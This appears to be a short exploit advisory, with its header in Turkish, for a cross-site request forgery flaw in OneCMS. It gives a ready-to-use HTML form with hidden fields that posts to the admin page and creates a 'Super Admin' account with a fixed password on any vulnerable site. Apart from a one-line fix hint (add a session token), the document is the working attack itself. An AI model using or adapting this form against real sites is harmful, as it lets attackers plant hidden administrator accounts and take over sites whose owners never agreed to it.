< ------------------- header data start ------------------- >

#############################################################

# Application Name : OneCMS

# vulnerable Type : XSRF

# Infection : Yeni admin eklenebilir ..!

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir !

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form action=http://[site].com/[yol]/admin.php?load=users&view=add2 method=’post’>
<input type=hidden name=name value =_iLLeqaL_>
<input type=hidden name=password1 value=123456>
<input type=hidden name=email value=[email protected]>
<input type=hidden name=level value=Super Admin>
<input type=hidden name=slist value=No>
<input type=submit name=Add value=Add User>
</form>

< -- bug code end of -- >